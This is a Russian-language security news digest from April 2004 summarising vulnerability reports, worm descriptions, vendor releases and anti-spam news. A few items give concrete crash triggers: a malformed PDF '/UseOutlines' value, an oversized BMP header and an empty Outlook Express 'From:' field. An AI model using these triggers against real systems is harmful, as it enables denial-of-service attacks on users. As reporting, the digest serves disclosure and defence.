Уязвимость в Adobe Acrobat Reader обнаружена всё тем же Arman Nayyeri. Экспериментируя в 16-ричном редакторе, автор наткнулся на довольно интересную особенность при чтении PDF-файлов (для чего, собственно, и предназначен Adobe Acrobat Reader). Изменив один из параметров на заведомо большое число и попытавшись открыть этот файл, Arman увидел сообщение, что файл повреждён с преложением его восстановления. Однако в процессе восстановления была исчерпана вся оперативная память компьютера, что привело к типичной ситуации DoS. Как выяснилось позже, подобная ситуация возникает при задании параметра PDF-файла - "/UseOutlines ?>> ?endobj?[big number]" (в эксперименте использовалось значение 9999999). Ввиду возможности загрузки PDF-файла с Вэб-страницы, уязвимость может быть использована удалённо.
Подробности

13/04/2004 17:24 Уязвимость в Internet Explorer
Следующей уязвимостью, обнаруженной Arman Nayyeri является уязвимость в браузере Internet Explorer. Уязвимость связана с механизмом обработки и размещения в памяти BMP-файлов. Когда IE загружает BMP-файл (например, встретив тэг <IMG..>) размер файла берётся из соответствующей информации внутри самого BMP. После этого происходит выделение соответствующего объёма памяти для дальнейшего размещения файла, при этом действительный размер файла не проверяется. Таким образом, разместив на Вэб-странице некоторое количество графических файлов, внутри которых задан заведомо большой размер файла, можно удалённо провести атаку типа DoS на браузер IE, вследствие исчерпания доступных ресурсов. Подготовлена демонстрационная страница (открывать которую следует с осторожностью).
Описание

13/04/2004 17:10 Уязвимость в Outlook Express
Исследователь компьютерной безопасности из Ирана Arman Nayyeri обнаружил три уязвимости в популярных программных продуктах, о которых и известил в списке рассылки BUGTRAQ. Первая уязвимость связана с механизмом обработки файлов формата .EML в популярном почтовом клиенте Outlook Express. Автор обнаружил, что при отсуствии поля "From:", либо при пустом поле "From: " Outlook Express прекращает свою работу. Первым предположением было переполнение буфера, однако впоследствии был сделан вывод о том, что отказ почтового клиента происходит из-за некорректного указателя данных (invalid data pointer). Автором подготовлена тестовая страница в демонстрационных целях.
Описание

13/04/2004 16:54 Уязвимость в ядрах Linux
Никита Ющенко из МГУ опубликовал в BUGTRAQ информацию, согласно которой возможно выполнение локального DoS в Linux с ядрами 2.4, 2.6. Уязвимость (или баг) связана с механизмом работы нитей (linuxthreads). При завершении одной из нитей другая нить того же процесса получает сигнал 33 (SIGRT_1), что свидетельствует о завершении соседней нити при этом завершившаяся нить находится в статусе "zombie". В случае генерации сигнала, соответствующий код ядра размещается в объекте, который называется "struct sigqueue", который держит информацию о сигнале до момента доставки другой нити. Однако в этой структуре может быть одновременно размещено ограниченное количество информации. Для сигналов с идентификаторами меньше 32 в коде ядра есть механизм, позволяющий доставить сигнал независимо от состояния объекта "struct sigqueue". В случае же описываемого сигнала 33 в случае невозможности помещения информации в "struct sigqueue" просто возвращается значение -EAGAIN. В результате процесс не будет оповещён о завершении нити и закончившаяся нить останется в состоянии "zombie". Для long-living процессов, порождающих много short-living нитей (например, mysqld), переполнение таблицы процессов происходит за несколько минут. В результате возникает типичная ситуация DoS. Автором написан исходный код эксплоита. В ядрах 2.6, использующих NPTL, механизм оповещения процессов несколько другой, однако и там существует возможность DoS.
Подробности

13/04/2004 16:05 Уязвимость в Internet Explorer
Центр компьютерной безопасности CERT опубликовал бюллетень по безопасности, посвящённый серьёзной уязвимости, обнаруженной в популярном браузере Internet Explorer. На этот раз уязвимость связана с механизмом междоменной безопасности (Cross Domain Security). Природа уязвимости скрывается в механизме обработки протокола Microsoft InfoTech Storage (ITS). Этот механизм используется в том числе и при обработке прекомпилированных файлах помощиб имеющих расширение .CHM. Протокол используется при помощи переключателей протокола вида: ms-its, ms-itss, its, mk:@MSITStore. При этом возможно формирование ссылки как на внешний файл, так и на локальный. Из-за недоработок в модели междоменной безопасности возможна ситуация, когда скрипт, вызванный по протоколу ITS будет выполнен не в своей зоне безопасности, а в зоне локального компьютера (Local Machine Zone). В результате злоумышленник получает возможность выполнения произвольного кода в этой зоне с привилегиями текущего пользователя. Как обычно в подобных случаях, для удалённого выполнения атаки необходимо либо сформировать Web-страницу, либо прислать файл/ссылку по электронной почте. Как вариант защиты, рекомендуют временно отключить в реестре ключи обработки протокола ITS: HKLM\SOFTWARE\Classes\PROTOCOLS\Handler\{ms-its,ms-itss,its,mk,mhtml}. Естественно, в этом случае теряется возможность использования файлами справки. Micrisift Обещает исправить уязвимость в следующем комплексном сервис-паке.
Описание

13/04/2004 15:26 Выход FreeBSD 4.10-BETA
Команда разработчиков популярной ОС FreeBSD объявила о выходе исходных текстов новой версии FreeBSD - 4.10-BETA. Эта версия предназначена для платформ x86 и Alpha. Желающие могут скачать ОС и присоединиться к прцессу тестирования. Согласно графика выхода предполагается 21 апреля выложить RC-версию (релиз-кандидат) и 5 мая выпустить оончательный вариант новой версии ОС. Предполагается, что это будет последний релиз ветви 4.Х, который полностью уступит значение STABLE версиям 5.Х.
Анонс

13/04/2004 14:43 IBM и Cisco принимают меры по ликвидации уязвимостей своих продуктов
Корпорация IBM и компания Cisco предупредили о существовании уязвимостей, которые могут эксплуатироваться удаленными хакерами. Администраторам систем, построенных на продуктах компаний, следует принять меры безопасности. По данным отчета о "дырах" в OpenSSL, вышедшего в ноябре 2003 года, последней жертвой этих уязвимостей был HTTP-сервер IBM. Дыры OpenSSL обнаруживаются при появлении некорректных последовательностей кодов ASN.1. Удаленные хакеры могут воспользоваться ими, в результате чего произойдет делокализация памяти и, как следствие, отказ сервисов и выполнение произвольного кода. Данная проблема характерна для версий 1.x и 2.x. HTTP-сервера IBM. В модернизированных версиях 1.3.x и 2.0 подобных уязвимостей нет. Коммутаторы Catalyst 6500 Series и интернет-маршрутизаторы 7600 Series Cisco, использующие модуль сервисов IP-безопасности VPN (VPNSM), имеют другую уязвимость. VPNSM является высокоскоростным компонентом, поставляющим интегрированные в инфраструктуру сервисы IP-безопасности VPN. Удаленные хакеры, использующие специальные пакеты Internet Key Exchange (IKE), могут вызвать поломку и перезагрузку техники, вследствие чего произойдет отказ сервисов. Данная прорблема характерна для версий 12.2SXA, 12.2SXB и 12.2SY Cisco IOS, использующих VPNSM. Данную уязвимость нельзя защитить с помощью временных средств защиты, но Cisco уже разработала некоторые поправки для этих версий. Помимо этого случая, в прошлом месяце уже был обнаружен ряд уязвимостей Cisco.
Источник

13/04/2004 14:18 Червь VBS.Gaggle перезаписывает файлы на жёстком диске
Компания Symantec предупреждает о появлении нового интернет-червя VBS.Gaggle.D (другие названия I-Worm.Gedza, VBS/Gedza.A). Вредоносная программа рассылает собственные копии по электронной почте посредством встроенного SMTP-сервера, кроме того, вирус способен распространяться через mIRC, ICQ и некоторые файлообменные сети. После неосторожного запуска вложенного в письмо файла с именем Filezip.zip червь создает свою копию в системной папке Windows, а также записывает туда ряд вспомогательных файлов. Далее вирус открывает окно браузера Internet Explorer и отображает в нем фотографию известной поп-исполнительницы Эврил Лавинь. Таким образом, заметить присутствие вредоносной программы на компьютере несложно. После этого VBS.Gaggle.D регистрируется в системном реестре, обеспечивая себе при этом автоматический запуск при загрузке ОС. Кроме того, червь способен перезаписывать файлы с расширениями vbs, .vbe, .js, .jse, .hta, .htm, .html, .php, .shtm, .shtml, .phtm, .phtml, .mht, .mhtml, .plg, и .htx собственными копиями, а также уничтожать vbs-файлы на флоппи-дискетах. В процессе генерации инфицированных сообщений поле "От кого" фальсифицируется, а тема письма и его содержание варьируются произвольным образом. Наконец, вирус отправляет письма с украденной информацией (например, найденными адресами почты) своему автору. Впоследствии эти адреса могут использоваться для составления списков массовых рассылок. Червь VBS.Gaggle.D представляет угрозу для пользователей компьютеров с ОС Windows 2000, 95, 98, Me и XP.
Подробности

13/04/2004 12:21 Выход электронного журнала "Спамтест" No. 44
Выпущен очередной, 44-й, номер электронного журнала "Спамтест", посвящённого борьбе со спамом. В номере: новости; выпущена новая версия SPAMTEST ISP V2.0; cпам - статистика недели 29 марта - 4 апреля 2004 г; моя битва со спамом (читатели пишут); предлагаю способ борьбы со спамом (читатели пишут).
Журнал

13/04/2004 11:01 Microsoft завершила тяжбу, выплатив истцу 440 миллионов долларов
Корпорация Microsoft согласилась выплатить 440 миллионов долларов в порядке мирового соглашения с компанией InterTrust Technologies, сообщает Reuters. Microsoft обвиняли в незаконном использовании программ, произведенных InterTrust Technologies. Эта компания производит программы для оборудования, которое не допускает использование пиратских компакт-дисков. Среди совладельцев InterTrust Technologies - Sony Corp. и Philips Electronics. Три года назад InterTrust подала на Microsoft в суд, заявив, что корпорация встроила в свою новую версию Windows Media Player технологию защиты от копирования, авторские права на которую, как считает InterTrust, принадлежат только ей. В сумму, которую выплатит Microsoft, входит не только штраф за использование программы, но также и лицензионное соглашение - теперь корпорация имеет право свободно использовать ее на легальных основаниях.
Подробности

13/04/2004 10:58 Установлен первый комплекс NetSwift iGate в России
Компания Rainbow Technologies (www.rainbow.msk.ru) сообщает, что представленное на рынке в середине первого квартала 2004 года новое устройство NetSwift iGate введено в эксплуатацию на одной из крупнейших компаний – производителей продуктов питания. Программно-аппаратный комплекс NetSwift iGate обеспечивает безопасность SSL VPN каналов этого предприятия, связывающих его филиалы с центральным офисом. Благодаря двухфакторной аутентификации на основе электронных USB-ключей iKey, сотрудникам предоставляется защищённый доступ у требуемым ресурсам наиболее простым способом – через Web-интерфейс. Каждый сотрудник, в соответствии с политикой безопасности компании, имеет свой iKey. При этом не требуется ни обучение сотрудников, ни дополнительное ПО на клиентских местах. Как отметила Ирина Момчилович, коммерческий директор Rainbow Technologies, «NetSwift iGate – удобное решение для каждой организации, нуждающейся в предоставлении защищенного удалённого доступа к собственным ресурсам и не желающей заниматься вопросами интеграции и переконфигурации своей сетевой инфраструктуры. Мы очень рады, что российские компании начинают по достоинству оценивать эту уникальную технологию. Большой интерес к этому проявляют и банки. Нашими партнёрами уже начато несколько проектов по использованию NetSwift iGate в системах «клиент-банк», поэтому мы ожидаем серьезный всплеск продаж этих устройств в этом году».
Подробности

12/04/2004 13:23 Недельный отчет о вирусах Panda Software
Опубликован еженедельный вирусный обзор прошедшей недели от компании Panda Software. В отчете рассмотрены четыре червя: Bugbear.C, версии S и T Netsky, а также Sober.F.
Отчёт

12/04/2004 13:16 WiFi можно ускорить внесколько раз
Компания Tolly Group объявила об успешном завершении тестирования WiFi-точки доступа производства фирмы Enigm. Особенностью протестированной разработки является одновременное использование нескольких каналов в то время, как традиционные точки доступа используют лишь один канал для передачи данных. Во время проведенного тестирования прототип точки доступа Engim EN-3000 802.11g показал значительное преимущество перед продуктами других фирм, достигнув скорости передачи данных в 50Мбит/сек, в то время как одноканальные точки доступа демонстрировали скорость передачи данных в диапазоне 1-3Мбит/сек. Использование протестированного оборудования имеет большой смысл при применении направленных антенн – в таком случае занятие точкой доступа одновременно нескольких радиоканалов не отразится на скорости обмена данными между располагающимися в непосредственной близости другими WiFi-устройствами. Предполагается, что черийное производство новинки начнется в третьем-четвертом квартале этого года. Приблизительно в это же время станут доступны и высокоскоростные решения на базе стандарта WiMAX.
Источник

12/04/2004 12:38 Обновлен ПК-вариант VMware
Анонсирована новая версия системы виртуализации разработки компании VMware, предназначенная для персональных компьютеров - VMware Workstation 4.5. Инструментарий позволяет создавать по нескольку виртуальных машин на одной системе, например в целях тестирования и развертывания приложений. Имеются функции формирования и развертывания готовых образов виртуальных машин и поддержка технологии Intel Preboot Execution Environment (PXE) - с ее помощью Workstation 4.5 дает возможность удаленного создания виртуальных машин и инсталляции ОС и приложений на рабочие станции конечных пользователей корпоративной сети. В числе поддерживаемых "гостевых" ОС - Windows, Linux (в том числе с экспериментальными ядрами серии 2.6.х) и Novell Netware. Функция интеграции с Windows Performance Monitor позволяет наблюдать с помощью данного модуля Windows реальные показатели производительности виртуальных машин. Максимальная емкость оперативной памяти, доступной каждой виртуальной машине - 3,6 Гбайт, емкость памяти, доступной всем виртуальным машинам в пределах одной системы - 4 Гбайт.
Источник

12/04/2004 12:06 В Москве вводится новая идентификация для компьютерных носителей информации
С 15 апреля в Москве вводится новая специальная идентификационная марка для аудио-, видеопродукции и компьютерных информационных носителей. Как сообщил в пятницу, 9 апреля, представитель ГУП "Информзащита", марки производителям будут выдаваться бесплатно на основе документов, подтверждающих качество продукции. Марка, имеющая несколько степеней защиты – голографическое изображение, рельефная печать и др., будет содержать сведения о проекте (имя исполнителя, название фильма и т.д.), данные о правообладателе, год выпуска и название самого носителя. Идентификационный знак будут клеить на упаковку таким образом, чтобы при вскрытии она приходила в негодность. Кроме того, с 1 мая в столице вводится новая система контроля за реализацией аудио-, видеопродукции. "Отсутствие идентификационной марки на упаковке будет служить поводом для проверки качества продукции и принятия мер к распространителям подделок со стороны правоохранительных и контролирующих органов", – сообщил источник в городской администрации.
Источник

12/04/2004 11:53 Открыты исходные коды системы электронного голосования
Компания VoteHere, занимающаяся разработкой программного обеспечения для систем электронного голосования, приняла решение опубликовать в интернете исходные коды своих продуктов. Помимо исходников ПО, на официальном сайте VoteHere также представлен специальный симулятор, обеспечивающий возможность пошаговой проверки процесса выполнения команд. Предполагается, что данное решение компании позволит доказать надежность примененных алгоритмов и, соответственно, уменьшить степень недоверия экспертов и избирателей к автоматическим системам сбора и подсчета голосов. Следует заметить, что внедрение электронных систем голосования должно значительно ускорить и удешевить процесс проведения выборов, облегчить сортировку результатов и исключить ошибки. Однако, по мнению многих экспертов, существующие сегодня технологии не обладают достаточной степенью защиты, поэтому вероятность постороннего вмешательства весьма высока. В частности, в июле 2003 года сотрудники американского Университета Джона Хопкинса в Мэриленде обнаружили в исходном коде программного обеспечения для автоматов голосования производства фирмы Diebold ряд очень серьезных уязвимостей и ошибок. Позднее, в январе 2004 года, была доказана и слабость защиты систем голосования, использующих для передачи результатов беспроводные сети. Наконец, около двух месяцев назад Пентагон прекратил эксперимент по проведению электронного голосования в связи с недостаточной надежностью сопутствующего ПО.
Источник

12/04/2004 11:32 Microsoft урезает Longhorn, чтобы выпустить ОС в 2006 году
В пятницу Microsoft сообщила, что она намерена выпустить Longhorn в первом полугодии 2006 года — для этого компании придется отказаться от некоторых наиболее амбициозных планов в отношении следующей версии Windows. В Longhorn сохранятся три основные усовершенствования: новая файловая система WinFS, новый графический механизм Avalon и архитектура веб-сервисов Indigo. «В этих подсистемах могут быть отдельные функции, которые придется ограничить», — сказал главный менеджер продукта Грег Салливан (Greg Sullivan). Он не назвал эти функции, но подчеркнул, что подобные изменения типичны для всех новых выпусков операционной системы Windows. «Это корректировка на несколько градусов вниз, — сказал Салливан. — Бывает, что сценарии приходится сокращать». Microsoft отказывалась назвать дату выпуска новой версии Windows, хотя главный архитектор ПО Билл Гейтс недавно указал в качестве вероятного срока 2006 год. Даже теперь, по словам Салливана, официальная дата выпуска Longhorn отсутствует, но он признал, что во внутреннем графике компании значится середина 2006 года. В прошлом месяце вице-президент отделения платформ Microsoft Джим Оллчин сообщил CNET News.com, что Microsoft планирует убрать некоторые функции из Longhorn и перенести их в будущий релиз Windows с кодовым названием Blackcomb. Работа над Longhorn замедлилась после того, как Microsoft перебросила программистов с этого проекта на решение задач по введению дополнительных средств защиты в Windows XP Service Pack 2 (SP2), который должен выйти в ближайшее время. В интервью CNET News.com в прошлом месяце СЕО Стив Баллмер сказал, что Microsoft приняла решение повысить приоритет SP2 за счет Longhorn. Баллмер говорил, что все основные компоненты останутся в составе ОС, но компания планирует «скруглить углы у пары функций».
Подробности

12/04/2004 10:42 Intel устанавливает "железный занавес" перед хакерами и пиратами
Корпорация Intel представила в понедельник на Тайване следующее поколение микропроцессоров Intel для мобильных телефонов и КПК. Эти процессоры включают в себя, в первую очередь, встроенную систему безопасности, которая может усилить защиту от нелегального копирования, а также предотвратить попытки взлома беспроводных сетей, сообщает Accociated Press. Процессоры PXA27x содержат специальное устройство безопасности, расположенное на той же силиконовой пластине, что и основные компоненты процессора, но обособленно от них. Это устройство также имеет доступ к защищенной памяти. Новые процессоры Intel могут гарантировать производителям мобильных телефонов и КПК новую, реализованную на аппаратном уровне, систему защиты для тех потребителей, которые используют портативные электронные устройства для доступа в корпоративную сеть или которые просто хотят закрыть свою информацию для остальных пользователей. Еще один вариант использования таких процессоров - защита от нелегального копирования музыки и видео. Музыкальная композиция или фильм будут проигрываться только в том случае, если система безопасности убедится не только в легальности данной копии, но и в легальности используемого программного обеспечения.
Подробности

11/04/2004 14:16 Начало подачи статей для PHRACK #62
Объявлено о начале приёма статей для очередного номера популярнейшего в мире компьютерного андэграунда электронного журнала PHRACK #62. Приём будет окончен 1-го июля. Как всегда, предлагается подавать статьи на темы: хакинг, фрикинг, кардинг, радио, электроника, реверс инжиниринг, криптография и др. Предлагается также представлять свои инструменты, связанные с компьютерной безопасностью. Журнал издаётся с 1985 г.
Подробности

11/04/2004 13:09 Выпущена новая версия StrongDisk Pro
Компания "Физтех-софт" объявила о выходе новой версии системы защиты информации StrongDisk Pro 3.1. Новая версия содержит существенные технические доработки, кроме того, система оснащена новой, более надежной, системой регистрации. Система StrongDisk Pro - средство для защиты конфиденциальной информации на ПК, ноутбуках и сменных носителях. В ОС создаются защищенные диски, при записи на которые информация сразу же кодируется. Физически защищенный диск представляет собой обычный файл с произвольным именем и расширением. Чтобы получить доступ к закодированной информации, защищенный диск необходимо подключить, то есть пройти трехфакторную аутентификацию: ввести пароль, подключить электронный ключ и предоставить файл-ключ. Если хотя бы одна из этих компонент отсутствует, расшифровать информацию на защищенном диске будет невозможно. В дальнейшем ОС воспринимает защищенный диск так же, как и обычные логические диски. Встроенные в систему средства экстренного реагирования позволяют мгновенно отключить диски или заменить всю информацию ложной. В новой версии StrongDisk Pro реализованы следующие новые возможности: изменять параметры кодирования уже существующего защищенного диска: ключ кодирования данных, алгоритм кодирования заголовка диска и данных, алгоритм хэширования; возможность устанавливать число <проходов> при полном затирании файлов и свободного места на диске, то есть регулировать число записей поверх файла случайного кода; возможность сохранять заголовки на электронных ключах и др.
Источник

11/04/2004 12:49 Игорь Ашманов: западные фильтры российский спам не фильтруют
Разговоры о росте числа несанкционированных рассылок в Рунете и о вреде, который они наносят, не стихают. Напротив, с каждым днем они становятся все громче. Так, недавно руководство Ассоциации документальной электросвязи заявило, что, по подсчетам их специалистов, ущерб, причиняемый распространением спама провайдерам и пользователям, в денежном выражении составляет $ 55 млн ежегодно. О том, как в связи с началом очередного бизнес-сезона и прошедшими недавно вирусными эпидемиями изменилась общая ситуация на поле битвы со спамом, «Веб-информу» рассказал один из главных российских антиспамеров – глава компании «Ашманов и партнеры» Игорь Ашманов.
Интервью

11/04/2004 12:16 Новая форма интернет-мошенничества
Новая форма мошенничества появилась в российском сегменте интернета. Злоумышленники, вскрыв электронный почтовый ящик того или иного человека, рассылают от его имени письма на адреса, забитые в адресной книге, с просьбой срочно перечислить некоторую сумму денег с помощью системы Western Union. Об этом Нижегородскому телеграфному агентству сообщил один из потенциальных пострадавших, которому пришло подобное письмо с адреса давнего знакомого. В письме тот якобы просил его пересилить 200 долларов США на имя некоего Андрея Климова. Позже выяснилось, что человек, с адреса которого было отослано письмо, с подобной просьбой ни к кому не обращался. Собеседник НТА посоветовал с подозрением относиться к подобным письмам и проверять, действительно ли их написал тот человек, с чьего адреса они были присланы.
Источник

11/04/2004 11:34 Виртуальные машины Java станут многозадачными
Как сообщил представитель Sun на конференции ClusterWorld Conference & Expo, в компании работают над тем, чтобы обеспечить возможность параллельного исполнения нескольких программ под управлением одной виртуальной машины Java. Этой цели будет служить функция Isolates, запланированная к реализации в платформе J2SE 1.6, бета-версию которой планируется выпустить осенью этого года. Данная функция даст возможность изолированным друг от друга задачам исполняться одновременно, не требуя запуска отдельной копии JVM для каждой. В новой версии J2SE также планируется реализовать поддержку протокола Sockets Direct Protocol, обеспечивающего, по словам представителя Sun, возможность высокоскоростной связи между Java-приложениями. Релиз J2SE 1.5, ориентированный главным образом на то, чтобы сделать программирование на Java более простым, планируется приурочить к проведению конференции JavaOne, которая пройдет в июне. Финальная версия J2SE 1.6 ожидается в будущем году.
Источник

11/04/2004 10:17 Процессора UltraSPARC V не будет
Sun Microsystems, в целях экономии средств, остановила проект по разработке процессора UltraSPARC V, который по производительности должен был превзойти UltraSPARC III примерно в 15 раз и принципиально отличаться от предыдущих UltraSPARC III, IV, сообщает opennet.ru. Освобожденные силы и средства планируется направить в развитие технологии "Throughput Computing systems". В недалеком будущем Sun выпустит UltraSPARC IV+, а в 2006-2007 году - чипы Niagara и Rock. Sun также все больше и больше продает серверов на базе CPU от Intel и AMD.
Подробности

10/04/2004 16:47 Эстонский банк подвергся атаке хакеров
Один из эстонских банков, Hansapank, вновь подвергся атаке хакеров, в результате которой у его клиентов возникли сложности с доступом в банк через сети интернет, сообщает РИА «Новости». По информации пресс-службы банка, в четверг с различных интернет-адресов на сервер банка в массовом порядке стали поступать информационные запросы, перегрузившие его корпоративную сеть. В связи с этим у многих клиентов, пытавшихся с помощью систем интернет-доступа обратиться в банк, возникли сложности с доступом. По информации банка, его специалистам удалось довольно быстро распознать атаку и принять меры защиты. Личная информация и сбережения клиентов Hansapank в результате атаки не пострадали. Атаки такого типа, называемые Denial-of-Service, нацелены не на хищение информации о клиентах или несанкционированные операции с их счетами, а на вывод из строя компьютерной сети атакуемого предприятия путем ее перегрузки. Специалисты предполагают, что эту акцию предприняли те же злоумышленники, которые атаковали сеть банка 12 марта текущего года. Тогда в результате перегрузки сервера банка также возникли сложности с интернет-доступом клиентов в банк. Руководство Hansapank обращалось в полицию за помощью, однако «интернет-террористы» пока не найдены.
Источник

10/04/2004 16:21 Австралийские провайдеры закрывают порт 25 для борьбы со спамом
Австралийский телекоммуникационный оператор Telstra, предоставляющий услуги доступа в интернет под брендом BigPond. начнет с 13 апреля блокировать доступ к 25 порту, через который по протоколу SMTP производится отправка сообщений электронной почты. Данный шаг провайдер объясняет намерением бороться со спамерами. В разосланном сообщении для абонентов провайдера, говорится также, что корпоративные клиенты, желающие продолжать использование 25 порта, должны подписаться на дополнительные сервисы, в результате чего за дополнительную плату они получат статический IP-адрес. Блокирование будет вводится поэтапно на всех тарифных планах провайдера. Ранее, в январе 2004 года, другой австралийский провайдер Optus также начал блокирование 25 порта в своей сети.
Источник

10/04/2004 15:37 Трафик абонентов "Стрим" будет фильтроваться
Как сообщает "МТУ-Интел" (Москва), в связи с увеличением количества атак на оборудование пользователей, компания вводит фильтрацию входящего трафика к клиентам услуги "Домашний Интернет Канал СТРИМ" с 13 апреля 2004 года. Фильтрации подлежит трафик протоколов TCP для портов 25, 135-139 включительно, 445, а также UDP для портов 135-139 включительно.
Подробности

10/04/2004 13:48 В Туле судят кардеров
Накануне в суде Зареченского района Тулы состоялось первое заседание по делу о фальшивых пластиковых картах. На скамье подсудимых двое: житель Тульской области Сергей Филимонов и киевлянин Александр Веркалец. Подсудимых задержали сотрудники ФСБ. Их обвиняют в использовании поддельных пластиковых карт «VISA» и «MasterCard» в магазинах Тулы. Если суд вынесет обвинительный приговор, подсудимым грозят от 2 до 6 лет лишения свободы. Приговор по аналогичному делу вынес суд Привокзального района Тулы в октябре прошлого года. Тогда одессит Александр Ильящук получил 4 года и 6 месяцев за липовые кредитки. Его задержали в мае прошлого года сотрудники тульского ФСБ около торгового центра «Интерсити», после того как Ильящук купил золотые украшения в магазине «Остров Сокровищ». В торговом центре он увидел, что к оплате принимают пластиковые карты «VISA» и решил купить несколько золотых украшений. Однако карта «VISA International» не сработала, он достал другую, та тоже не сработала. Тогда преступник вышел из магазина, взял еще одну карту и вернулся в магазин. Эта карта прошла, он забрал украшения, а около машины был задержан сотрудниками ФСБ. Принцип действия поддельных карт: деньги поступают на карту со счетов добросовестных клиентов банка. Клиенты становятся жертвами хакеров (компьютерных взломщиков): они взламывают сайты интернет-магазинов и узнают пин-коды пластиковых карт покупателей. Задержание Ильящука – результат работы не только тульских чекистов, но и коллег из других регионов. Сотрудники ФСБ утверждают, что они пресекли деятельность международной группировки так называемых «кардеров». Филимонова и Веркальца тоже взяли тульские чекисты, но изготовителей поддельных карт они не нашли. В деле, которое рассматривает Зареченский суд, есть только обвиняемые, потерпевших нет: магазины свои деньги получили, банки обеспечили операцию по переводу денег.
Источник

10/04/2004 13:24 Основы работы с OpenSSL
На сайте Дмитрия Шурупова - www.nixp.ru опубликована статья Всеволода Стахова, посвящённая описанию работы с популярным пакетом, реализующим криптозащиту - OpenSSL. «OpenSSL — это система защиты и сертификации данных, название SSL переводится, как система безопасных сокетов (secure socket layer). OpenSSL используется практически всеми сетевыми серверами для защиты передаваемой информацией…»
Статья

10/04/2004 12:20 Обзор семейства продуктов Red Hat Enterprise Linux 3
На www.LinuxCenter.ru опубликован перевод документа, который содержит информацию о семействе продуктов Red Hat Enterprise Linux, сообщает linux.org.ru. В нем описаны возможности и преимущества семейства, а также приведен поверхностный обзор Red Hat Applications, набора добавочных продуктов, созданных для окружений Red Hat Enterprise. Первоначальный релиз семейства Red Hat Enterprise Linux -- версия 2.1 Данный документ описывает последний релиз семейства -- версию 3 -- который был выпущен в октябре 2003 года.
Обзор

10/04/2004 11:48 США выслеживают террористов по электронной почте
В распоряжении американских спецслужб все же имеются средства контроля за интернет-трафиком. В свое время, публикации в прессе о системах слежения Carnivore и Echelon наделали много шума и активно критиковались защитниками гражданских свобод. Однако после терактов 11 сентября разговоры о системах слежения пошли на спад, а сами системы слежения, как выяснилось, действуют и активно используются спецслужбами. Недавно стало известно о первом случае ареста подозреваемого в связях с террористами, выявленного с помощью американской системы мониторинга трафика. Как сообщает The Globe and Mail со ссылкой на Sunday Times, недавно в Канаде и Великобритании были проведены несколько арестов лиц, подозреваемых в причастности к терроризму и выявленных с помощью проанализированной АНБ США электронной переписки. В Sunday Times при этом ссылаются на анонимные источники в британских спецслужбах. По сообщению Sunday Times, АНБ перехватило электронное письмо, направленное из Пакистана в Великобританию. Письмо было перехвачено АНБ, так как проходило через расположенный на территории США сервер. Содержание письма не разглашается, однако, по всей видимости, оно оказалось очень важным, так как спецслужбы сразу взялись за расследование. В результате, были арестованы девять человек в Великобритании и один в Канаде. И если о британских подозреваемых ничего не сообщается, то в Канаде был арестован двадцатичетырехлетний Мохаммед Момин Хавайя, проживавший в Орлеане, пригороде Оттавы (провинция Онтарио). АНБ никак не комментирует эти сообщения, однако американские эксперты считают, что мониторинг трафика действительно ведется и даже приводит к конкретным результатам, о чем и свидетельствует сообщение Sunday Times.
Источник

10/04/2004 10:54 От секьюрити-инструмента больше вреда, чем пользы?
В кругах специалистов по компьютерной безопасности принято считать, что простые в использовании скрипты для обмана систем защиты, так называемые «эксплойты», представляют угрозу для интернета. Проект Metasploit Project и его основатель Г.Д. Мур надеются изменить это мнение. В среду Metasploit Project выпустил обновленную структуру проектирования для инструмента Metasploit, который позволяет секьюрити-экспертам проверять подключенные к их сетям компьютеры и выявлять те из них, в которых есть неустраненные уязвимости. Новая структура, называемая Metasploit Framework 2.0, позволяет создавать стандартизованные плагины, помогающие легально проникать в компьютеры через вновь обнаруженные пробелы в защите. Уже существует 18 таких эксплойтов, способных решать 27 разных задач. В общем случае инструмент может помочь администраторам находить и «патчить» системы с уязвимостями, не позволяя злоумышленникам нарушить защиту компании, утверждает Мур. Однако подобный инструмент может сослужить службу и злоумышленникам, автоматически обнаруживая уязвимые серверы и позволяя проникнуть в компьютер даже человеку со слабой технической подготовкой. Недавний отчет аналитической фирмы Forrester показывает, что, после того как недобросовестные хакеры создают эксплойты, обычно наблюдается всплеск атак. Многие эксперты согласны с этим, утверждая, что подобные скрипты exploit-testing, автоматизирующие сложную техническую задачу использования уязвимости, плодят желающих побаловаться онлайновыми атаками.
Сайт проекта

10/04/2004 10:09 Основы программирования Netfilter на ассемблере
На бельгийском сайте rootshell.be опубликована статья о работе с Netfilter - подсистемой ядра linux 2.4(экспериментальная поддержка была включена начиная с версий 2.3), расширяющей возможности ОС в работе с сетевыми фреймами. Netfilter позволяет осуществлять пакетную фильтрацию, NAT и существенно расширить возможности работы с сетью за счёт установки специальных "hook'ов" в часть ядра ОС, ответственной за network. Их можно устанавливать в ядро одним из двух способов: статически(требуется перекомпиляция ядра) или в виде LKM, регистрируя тем самым разнообразные функции, которые будут вызываться при определенных условиях. Например, при получении определенного сетевого пакета. Язык программирования - ассемблер. В статье описано создание простейших модулей (LKM - Linux Kernel Modules) для демонстрации возможностей данной подсистемы.
Статья

9/04/2004 12:24 Появление нового трояна
Justin Polazzo из Технологического института шата Джоржия сообщает о появившемся вчера новом распространяющемся трояне. Как показал анализ, червь приходит по почте в виде присоединённого файла под названием ndemon.exe (.99 К). При запуске прописывает своё тело в директории c:\winnt и c:\winnt\system32 и добавляет ключи в реестр HKLM\Software\Microsoft\CurrentVersion\Run, HKLM\Software\Microsoft\CurrentVersion\RunServices. После этого пытается распространить себя в локальной сети через порты 135 и 139, используя известные уязвимости и предопределённый список паролей. Также слушает запросы от других инфицированных машин на порту 1025, а также сканировать сервера с запущенным IIS (порт 80) на наличие известных уязвимостей этого сервера. Инфициррованные машины были запущены под управлением win2k SP4 (все патчи) с установленным антивирусом Symantec AV v8.6.
Источник

9/04/2004 12:12 Бизнес спамеров растет
Бизнес спамеров растет. Меняются их технические возможности, у них становится больше серверов, больше денег на то, чтобы нанимать программистов и платить за хостинг. Количество самих спамеров увеличивается, потому что бизнес привлекательный, растущий. Глава компании «Ашманов и партнеры» Игорь Ашманов говорит, что за зимние месяцы 2004 года количество спама выросло на 30-40%. Прошлым летом общее количество спам-писем можно было оценивать миллионов в пятьдесят за день. К концу года стало миллионов 70, а потом – около 100. Ежегодный ущерб операторов и пользователей Интернета от рассылки несанкционированных рекламных сообщений (спама) в России составляет около 55 млн. долл. Об этом сообщил президент Ассоциации документальной электросвязи (АДЭ) Александр Иванов на пресс-конференции в ходе практической конференции «Обеспечение информационной безопасности при использовании информационно-телекоммуникационных сетей». По его словам, спам составляет около 35% Интернет-трафика. Заработки спамеров за счет рассылки нежелательных сообщений составляют около 3–5 млн. долл.
http://www.crime-research.ru

